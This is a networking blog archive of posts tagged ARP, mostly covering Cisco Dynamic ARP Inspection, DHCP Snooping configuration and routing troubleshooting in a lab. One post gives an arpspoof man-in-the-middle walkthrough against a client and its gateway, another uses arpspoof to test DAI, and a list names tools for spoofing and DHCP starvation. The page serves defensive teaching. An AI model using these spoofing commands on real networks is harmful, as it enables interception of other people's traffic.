Showing posts with label ARP. Show all posts
Showing posts with label ARP. Show all posts

30 July, 2014

Dynamic ARP Inspection (DAI)

# Attack Scenario 

 Mitigate with ARP Inspection
- Uses DHCP Snooping DB/Table
- Can use Static ARP ACL to Map
- To Trust or Not to Trust
- Header to Payload Validation

 ! ARP inspection uses the DHCP Snooping table
SW2#show ip dhcp snooping binding
MacAddress          IpAddress        Lease(sec)  Type           VLAN  Interface
------------------  ---------------  ----------  -------------  ----  --------------------
00:0C:29:16:57:AC   10.123.0.3       85971       dhcp-snooping  123   FasEthernet0/2 
B8:27:EB:51:1A:F6   10.123.0.4       82867       dhcp-snooping  123   FasEthernet0/5
Total number of bindings: 2

 ! Configure ARP Inspection
SW2(config)#ip arp inspection vlan 123

 SW2(config)#do show ip arp inspection vlan 123
Source Mac Validation      : Disabled
Destination Mac Validation : Disabled
IP Address Validation      : Disabled
 Vlan     Configuration    Operation   ACL Match          Static ACL
 ----     -------------    ---------   ---------          ----------
  123     Enabled          Active

  Vlan     ACL Logging      DHCP Logging      Probe Logging
 ----     -----------      ------------      -------------
  123     Deny             Deny              Off

 ! Configure Trunk port
SW2(config)#int fas 0/2
SW2(config-if)#description trunk port
SW2(config-if)#ip arp inspection trust

 ! Configure Access port
SW2(config)#int fas 0/1
SW2(config-if)#description user port
SW2(config-if)#ip arp inspection limit rate 10

 *** Logs after Attack
%SW_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs (Res) on Fa0/1, vlan 123. ([b827.eb51.1af6/10.123.0.6.57ac/10.123.0.3/01:23:03 UTC Mon May 4 1991])

 *** Logs after make some Nmap
%SW_DAI-4-PACKET_RATE_EXCEEDED: 11 packets recived in 25 milliseconds on Fa0/1.
%PM-4-ERR_DISABLE: arp-inspection error detected on Fa0/1, putting Fa0/1 in err-disable state

 * For more info use : 
SW2#show interfaces status err-disable
SW2#show ip arp inspection statistics vlan 123

 ! Configure 3 more additional validation check
SW2(config)#ip arp inspection validate src-mac dst-mac ip

 SW2(config)#do show ip arp inspection vlan 123
Source Mac Validation      : Enabled                                 <---
Destination Mac Validation : Enabled                                 <---
IP Address Validation      : Enabled                                 <---
 Vlan     Configuration    Operation   ACL Match          Static ACL
 ----     -------------    ---------   ---------          ----------
  123     Enabled          Active

  Vlan     ACL Logging      DHCP Logging      Probe Logging
 ----     -----------      ------------      -------------
  123     Deny             Deny              Off

 ! Configure ARP Access List For R1
SW2(config)#interface fastEthernet 0/3
SW2(config-if)#description Trunk to R1
SW2(config-if)#exit

 SW2(config)#arp access-list OUR-ARP-ACL
SW2(config-arp-nacl)#permit ip host 10.123.0.1 mac host 001f.9e00.ee89

 ! Verify
SW2(config-arp-nacl)#do show arp access-list OUR-ARP-ACL
ARP access list OUR-ARP-ACL
    permit ip host 10.123.0.1 mac host 001f.9e00.ee89

 ! Apply ACL Filter
SW2(config)#ip arp inspection filter OUR-ARP-ACL vlan 123

 SW2(config)#do show ip arp inspection vlan 123
Source Mac Validation      : Enabled
Destination Mac Validation : Enabled
IP Address Validation      : Enabled

  Vlan     Configuration    Operation   ACL Match          Static ACL
 ----     -------------    ---------   ---------          ----------
  123     Enabled          Active      OUR-ARP-ACL        No

  Vlan     ACL Logging      DHCP Logging      Probe Logging
 ----     -----------      ------------      -------------

  123     Deny             Deny              Off

 ! Auto Re-enable port
SW2(config)#errdisable recovery cause arp-inspection
SW2(config)#errdisable recovery interval 30

 root@kali#arpspoof -i eth0 -t 10.123.0.3 10.123.0.1
b8:27:eb:51:1a:f6 0:c:29:16:57:ac 0806 42: arp reply 10.123.0.1 is-at b8:27:eb:51:1a:f6

SWITCH LOG
%SW_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs (Res) on Gi0/2, vlan 123 ([b827.eb51.1af6/10.123.0.1/0:c:29:16:57:ac/10.123.0.1/15:34:45 UTC Mon Mar 2 1991])

 SW2(config)#do show ip arp inspection statistics vlan 123
 Vlan     Forwarded        Dropped     DHCP Drops       ACL Drops
 ----     ---------        --------    ----------       ---------
  123          40             24           24               0

 Vlan     DHCP Permits     ACL Permits    Probe Permits   Secure MAC Failure
 ----     ------------     -----------    -------------   ------------------
  123         25               11               0                  0 

  Vlan     Dest MAC Failure    IP Validation Failure    Invalid Protocol Data 
-----     ----------------    ---------------------   -----------------------
  123             0                     0                        0 
At
Tags:: , , , ,

17 July, 2014

IPv4 IGP Troubleshooting


R1#show ip route 
     10.0.0.0/24 is subnetted, 3 subnets
C       10.1.13.0 is directly connected, Serial0/0
C       10.1.1.0 is directly connected, Loopback0
C       10.1.146.0 is directly connected, FastEthernet0/0

 * I have two directly connected network and one Loopback.
* The network 10.1.146.0/24 is network between R1&R4&R6.

 # Make ping
R1#ping 10.1.146.6
Sending 5, 100-byte ICMP Echos to 10.1.146.6, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 8/20/52 ms

 R1#ping 10.1.146.4
Sending 5, 100-byte ICMP Echos to 10.1.146.4, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 16/22/32 ms

 * When I make ping and this ping is successful it´s says 3 things are correctly configured: 

 1) Routing lookup process is correct
2) Switching mechanism is moving packets out the interface 
3) Encapsulation is correctly configured

 R1#show ip route 10.1.146.6
Routing entry for 10.1.146.0/24
  Known via "connected", distance 0, metric 0 (connected, via interface)
  Routing Descriptor Blocks:
  * directly connected, via FastEthernet0/0   <---- We know where we have to send.
      Route metric is 0, traffic share count is 1
 
R1#show ip cef exact-route 10.1.146.1 10.1.146.4
10.1.146.1      -> 10.1.146.4     : FastEthernet0/0 (next hop 10.1.146.4) <-- we ned to know mak address.

 R1#show arp 
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  10.1.146.1              -   c201.0d08.0000  ARPA   FastEthernet0/0
Internet  10.1.146.4             32   c200.0d08.0000  ARPA   FastEthernet0/0    <--- MAC Address
Internet  10.1.146.6             32   c205.1488.0000  ARPA   FastEthernet0/0

 * Now we know how to forward traffic out the interface.
* If no one filtering ARPs we have basic connectivity.

 #Configure incorrect ARP entry.

 R1(config)#arp 10.1.146.4 aaaa.aaaa.aaa4 arpa

 R1#show arp 
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  10.1.146.1              -   c201.0d08.0000  ARPA   FastEthernet0/0
Internet  10.1.146.4              -   aaaa.aaaa.aaa4  ARPA                       <--- Static ARP entry
Internet  10.1.146.6             41   c205.1488.0000  ARPA   FastEthernet0/0

 R1#ping 10.1.146.4
Sending 5, 100-byte ICMP Echos to 10.1.146.4, timeout is 2 seconds:
.....
Success rate is 0 percent (0/5)

 * The connectivity filed.

# Configure Route to reach Lo 0 of R4

 R1(config)#ip route 10.1.4.0 255.255.255.0 10.1.146.4

 R1#ping 10.1.4.4
Sending 5, 100-byte ICMP Echos to 10.1.4.4, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 20/25/32 ms

 R1#show ip cef exact-route 10.1.146.1 10.1.4.4
10.1.146.1      -> 10.1.4.4       : FastEthernet0/0 (next hop 10.1.146.4) 

 R1#show ip route static
     10.0.0.0/24 is subnetted, 4 subnets
S       10.1.4.0 [1/0] via 10.1.146.4

 * Now I have to know how to reach 10.1.146.4

 R1#show ip route 10.1.146.4
Routing entry for 10.1.146.0/24
  Known via "connected", distance 0, metric 0 (connected, via interface)
  Routing Descriptor Blocks:
  * directly connected, via FastEthernet0/0    
      Route metric is 0, traffic share count is 1

 # Configure Incorrect more specific route.
 
R1(config)#ip route 10.1.146.4 255.255.255.255 serial 0/0

 R1(config)#do ping 10.1.146.4
Sending 5, 100-byte ICMP Echos to 10.1.146.4, timeout is 2 seconds:
UUUUU
Success rate is 0 percent (0/5)

 The connectivity filed.

 # Debug 

 R1(config)#do debug ip icmp 
ICMP packet debugging is on
R1(config)#do ping 10.1.146.4
Sending 5, 100-byte ICMP Echos to 10.1.146.4, timeout is 2 seconds:
UUUUU
Success rate is 0 percent (0/5)

 *Mar  1 01:38:04.599: ICMP: dst (10.1.13.1) host unreachable rcv from 10.1.13.3
*Mar  1 01:38:04.627: ICMP: dst (10.1.13.1) host unreachable rcv from 10.1.13.3
*Mar  1 01:38:04.635: ICMP: dst (10.1.13.1) host unreachable rcv from 10.1.13.3
*Mar  1 01:38:04.635: ICMP: dst (10.1.13.1) host unreachable rcv from 10.1.13.3
*Mar  1 01:38:04.639: ICMP: dst (10.1.13.1) host unreachable rcv from 10.1.13.3

 * Its says that R3 doesn't have destination route.

 #Configure incorrect out interface.

 R1(config)#ip route 10.1.4.4 255.255.255.255 ser0/0 10.1.146.4

R1#show ip route 10.1.4.4  
Routing entry for 10.1.4.4/32
  Known via "static", distance 1, metric 0
  Routing Descriptor Blocks:
  * 10.1.146.4, via Serial0/0              <--- incorrect out interface
      Route metric is 0, traffic share count is 1

At
Tags:: , ,

01 February, 2014

IP Address or Outoging Interface

R1#conf terminal
R1(config)#ip route 0.0.0.0 0.0.0.0 11.11.11.2
R1(config)#exit
R1#ping 192.168.1.1
Sending 5, 100-byte ICMP Echos to 192.168.1.1, timeout is 2 seconds:
.!!!!
Success rate is 80 percent (4/5), round-trip min/avg/max = 16/57/152 ms

 R1#show arp
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  11.11.11.2              0   c202.1464.0000  ARPA   FastEthernet0/0
Internet  11.11.11.1              -   c200.1464.0000  ARPA   FastEthernet0/0

 R1(config)#no ip route 0.0.0.0 0.0.0.0 11.11.11.2
R1(config)#ip route 0.0.0.0 0.0.0.0 fastEthernet 0/0
R1(config)#exit
R1#clear arp-cache
R1#ping 192.168.1.1
Sending 5, 100-byte ICMP Echos to 192.168.1.1, timeout is 2 seconds:
.!!!!
Success rate is 80 percent (4/5), round-trip min/avg/max = 8/28/64 ms
R1#show arp
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  11.11.11.2              0   c202.1464.0000  ARPA   FastEthernet0/0
Internet  11.11.11.1              -   c200.1464.0000  ARPA   FastEthernet0/0
Internet  192.168.1.1             0   c202.1464.0000  ARPA   FastEthernet0/0

 Note:
Everything works, but as you can see, the ARP table grows with each destination,
imagine this on a production environment with users connecting to the Internet.
Note:
Another issue we could have is that if Proxy-ARP is disabled on the Other Router, it breaks connectivity (no reply to the ARP requests)

 #Disable Proxy ARP
R2(config)#interface fastEthernet 0/0
R2(config-if)#no ip proxy-arp

 R1#ping 192.168.2.1
Sending 5, 100-byte ICMP Echos to 192.168.2.1, timeout is 2 seconds:
.....
Success rate is 0 percent (0/5)
R1#show arp
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  11.11.11.2              9   c202.1464.0000  ARPA   FastEthernet0/0
Internet  11.11.11.1              -   c200.1464.0000  ARPA   FastEthernet0/0
Internet  192.168.1.1             8   c202.1464.0000  ARPA   FastEthernet0/0
Internet  192.168.2.1             0   Incomplete      ARPA

Note:
When possible, always use the IP address as the next-hop on point-to-multipoint mediums.
At
Tags:: ,

16 November, 2013

DHCP Snooping 

Configure DHCP Snooping For VLAN 101: (Global Configuration)
configure terminal 
no ip dhcp snooping information option
ip dhcp snooping 
ip dhcp snooping vlan 101

Configure Trunk Ports:
interface range fastEthernet 0/7-8 (Trunk Ports Connected To DHCP. DHCP Offers Are Permited)
ip dhcp snooping trust 

Configure Access Port Limits:   (User Port)
interface fastEthernet 0/1
ip dhcp snooping limit rate 5  (5 DHCP Offers)

Configure Errdisable: 
errdisable detect cause dhcp-rate-limit
errdisable recovery cause dhcp-rate-limit
errdisable recovery interval 30


Configure Dynamic ARP Inspection DAI: (Global Configuration)
configure terminal 
ip arp inspection vlan 101 
ip arp inspection log-buffer entries 1024
ip arp inspection log-buffer logs 1024 interval 10





Configure Trunk Ports: (Trust Ports)

interface range fastEthernet 0/7-8 
ip arp inspection trust 


commands to verify the configuration:
show ip dhcp snooping
debug ip dhcp snooping event 
show log
show errdisable


DHCP Snooping is a security feature capable of intercepting DHCP messages crossing a switch and blocking bogus DHCP offers. DHCP Snooping uses the concept of trusted and untrusted ports. Typically, the trusted ports are used to reach DHCP servers or relay agents, while untrusted ports are used to connect to clients


Dynamic ARP Inspection (DAI) is a security feature that helps prevent ARP poisoning and other ARP-based attacks by intercepting all ARP requests and responses, and by verifying their authenticity before updating the switch's local ARP cache or forwarding the packets to the intended destinations.




Attacks:



• STP MiTM (Vlan) Attack: Yersinia, Ettercap



 STP MiTM (ISL) Attack: Yersinia, Ettercap, packETH



• ARP MiTM Attack: Ettercap



• MAC Overflow Attack: Ettercap



• DHCP Consumption Atack: Yersinia



• DHCP Starvation Attack: dhcpstarv
At
Tags:: , ,

02 November, 2013

ARP Spoof 

ARP Spoofing


Hacker HWaddr 00:21:85:96:10:4d
Hacker addr:  10.0.101.102

Victim 1 : addr: 10.0.101.103 (Client)
victim 2 : addr: 10.0.101.3     (GW)

Start Routing

root@bt:# cat /proc/sys/net/ipv4/ip_forward 
0

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward 
root@bt:~# cat /proc/sys/net/ipv4/ip_forward 
1

ARP Spoof Attack

root@bt:~# arpspoof -i eth0 -t 10.0.101.3 10.0.101.103

0:21:85:96:10:4d 0:0:c:7:ac:1 0806 42: arp reply 10.0.101.103 is-at 0:21:85:96:10:4d

root@bt:~# arpspoof -i eth0 -t 10.0.101.103 10.0.101.3 

0:21:85:96:10:4d 0:21:85:96:10:56 0806 42: arp reply 10.0.101.3 is-at 0:21:85:96:10:4d

Victim 

Before:

C:\Documents and Settings\Administrador> arp -a

No se encontraron entradas ARP

After:

C:\Documents and Settings\Administrador> arp -a

Interfaz: 10.0.101.103
Dirección IP             Dirección física          Tipo
10.0.101.3               00-21-85-96-10-4d        dinámico
10.0.101.102             00-21-85-96-10-4d        dinámico
At
Tags:: ,

18 April, 2013

Introduction to APR (Arp Poison Routing)


At
Tags:: ,
Subscribe to: Posts (Atom)